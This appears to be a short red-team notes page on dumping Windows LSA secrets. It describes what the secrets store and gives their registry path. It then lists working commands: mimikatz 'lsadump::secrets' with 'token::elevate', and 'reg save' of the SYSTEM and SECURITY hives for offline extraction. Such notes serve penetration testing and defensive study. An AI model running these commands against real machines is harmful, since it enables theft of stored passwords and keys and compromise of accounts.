Skip to content

Latest commit

 

History

History
55 lines (36 loc) · 1.55 KB

File metadata and controls

55 lines (36 loc) · 1.55 KB

Dumping LSA Secrets

What is stored in LSA secrets?

Originally, the secrets contained cached domain records. Later, Windows developers expanded the application area for the storage. At this moment, they can store PC users' text passwords, service account passwords (for example, those that must be run by a certain user to perform certain tasks), Internet Explorer passwords, RAS connection passwords, SQL and CISCO passwords, SYSTEM account passwords, private user data like EFS encryption keys, and a lot more. For example, the NL$KM secret contains the cached domain password encryption key.

Storage

LSA Secrets are stored in registry:

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets

Execution

Memory

Secrets can be dumped from memory like so:

{% code title="attacker@mimikatz" %}

token::elevate
lsadump::secrets

{% endcode %}

Registry

LSA secrets can be dumped from registry hives likes so:

{% code title="attacker@victim" %}

reg save HKLM\SYSTEM system & reg save HKLM\security security

{% endcode %}

{% code title="attacker@mimikatz" %}

lsadump::secrets /system:c:\temp\system /security:c:\temp\security

{% endcode %}

References

{% embed url="https://www.passcape.com/index.php?section=docsys&cmd=details&id=23" %}